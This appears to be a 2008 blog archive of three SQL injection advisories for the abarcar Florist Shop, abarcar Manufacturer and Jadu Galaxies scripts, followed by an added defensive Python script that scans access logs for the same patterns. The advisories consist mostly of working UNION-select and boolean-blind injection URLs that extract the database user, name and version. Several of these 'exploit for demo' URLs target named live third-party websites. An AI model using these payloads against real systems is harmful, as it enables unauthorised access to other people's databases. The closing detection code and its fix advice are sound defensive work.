abarcar Florist Shop System Script content.php (cat) Blind/Remote Sql inj
link: http://packetstormsecurity.org/0812-exploits/abarcarflorist-sql.txt
link: http://www.experl.com/abarcar-florist-shop-system-script-contentphp-cat-blind-remote-sql-inj-352/
Discovered By: ZoRLu
Exploit: ( remote )
http://localhost/script_path/content.php?cat=[SQL]
[SQL]=
-9999999999999+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,unhex(hex(concat(user(),0x3a,database(),0x3a,version())))--
exploit for demo: ( look at the page title )
http://www.angelstouch.com/content.php?cat=-9999999999999+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,unhex(hex(concat(user(),0x3a,database(),0x3a,version())))--
Exploit: ( blind )
http://localhost/script_path/content.php?cat=125+and+substring(@@version,1,1)=4 ( true )
http://localhost/script_path/content.php?cat=125+and+substring(@@version,1,1)=3 ( false )
exploit for demo:
https://www.angelstouch.com/content.php?cat=125+and+substring(@@version,1,1)=4 ( true )
https://www.angelstouch.com/content.php?cat=125+and+substring(@@version,1,1)=3 ( false )
Wednesday, 31 December 2008
Labels: a.q, abarcar, blind sql injection, experl, experl.com, php asp, remote, script, sql, sql injection, z0rlu, z0rlu.blogspot
abarcar Manufacturer System Script plistings.php (listingid) Blind/Remote sql inj
link: http://packetstormsecurity.org/0812-exploits/abarcarmanu-sql.txt
link: http://www.experl.com/abarcar-manufacturer-system-script-plistingsphp-listingid-blind-remote-sql-inj-353/
Discovered By: ZoRLu
Exploit: ( remote )
http://localhost/script_path/plistings.php?prlid=ZoRLu&listingid=[SQL]
[SQL]=
-99999999999999+union+all+select+0,1,2,3,4,unhex(hex(concat(user(),0x3a,database(),0x3a,version()))),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,unhex(hex(concat(user(),0x3a,database(),0x3a,version()))),65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103--
exploit for demo:
http://www.iqffreezer.com/plistings.php?prlid=ZoRLu&listingid=-99999999999999+union+all+select+0,1,2,3,4,unhex(hex(concat(user(),0x3a,database(),0x3a,version()))),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,unhex(hex(concat(user(),0x3a,database(),0x3a,version()))),65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103--
Exploit: ( blind )
http://localhost/script_path/plistings.php?prlid=ZoRLu&listingid=40+and+substring(@@version,1,1)=4 ( true )
http://localhost/script_path/plistings.php?prlid=ZoRLu&listingid=40+and+substring(@@version,1,1)=3 ( false )
exploit for demo:
http://www.iqffreezer.com/plistings.php?prlid=ZoRLu&listingid=40+and+substring(@@version,1,1)=4 ( true )
http://www.iqffreezer.com/plistings.php?prlid=ZoRLu&listingid=40+and+substring(@@version,1,1)=3 ( false )
Labels: blind sql injection, experl, experl.com, php asp, remote, sql, sql injection
Tuesday, 18 November 2008
Jadu Galaxies (categoryID) Blind SQL Injection Vulnerability
link: http://www.milw0rm.com/exploits/7144
Discovered By: ZoRLu
exploit for demo:
http://www.jadu.co.uk/galaxies/site/scripts/documents.php?categoryID=2+and+substring(@@version,1,1)=4 ( true )
http://www.jadu.co.uk/galaxies/site/scripts/documents.php?categoryID=2+and+substring(@@version,1,1)=3 ( false )
Labels: blind sql injection, Jadu Galaxies, php asp, php script, sql injection
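
Added example (not part of the original advisories): a defender-side access-log check for the request patterns shown in the three advisories above. It assumes that `cat`, `listingid` and `categoryID` are meant to carry integer IDs; the log lines are constructed samples in combined log format, and the function names are this example's own.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters named in the advisories above; treating them as integer IDs is an assumption.
NUMERIC_PARAMS = {"cat", "listingid", "categoryID"}
INT_RE = re.compile(r"-?\d{1,10}")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Keywords seen in the advisory payloads, used only to label a finding.
UNION_RE = re.compile(r"\bunion\b.*\bselect\b", re.I)
BLIND_RE = re.compile(r"\b(?:and|or)\b.*(?:substring|@@version)", re.I)

def classify(value):
    """Return None for a clean integer, otherwise a short reason string."""
    if INT_RE.fullmatch(value):
        return None
    if UNION_RE.search(value):
        return "union-select"
    if BLIND_RE.search(value):
        return "boolean-blind"
    return "non-integer"

def scan(lines):
    """Return (line_no, param, reason) for each suspicious numeric parameter."""
    findings = []
    for no, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        # parse_qsl decodes '+' and %xx, so encoded payloads are normalised first
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name in NUMERIC_PARAMS:
                reason = classify(value)
                if reason:
                    findings.append((no, name, reason))
    return findings

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [31/Dec/2008:10:00:01 +0000] "GET /script_path/content.php?cat=125 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [31/Dec/2008:10:00:05 +0000] "GET /script_path/content.php?cat=125+and+substring(@@version,1,1)=4 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [31/Dec/2008:10:00:09 +0000] "GET /script_path/plistings.php?prlid=x&listingid=-1+union+all+select+0,1,2-- HTTP/1.1" 200 731',
    '192.0.2.77 - - [31/Dec/2008:10:00:12 +0000] "GET /site/scripts/documents.php?categoryID=2%20AND%201=1 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule, enforced in the application before the value reaches the query (or replaced by a parameterized query), removes the injection point rather than just reporting it.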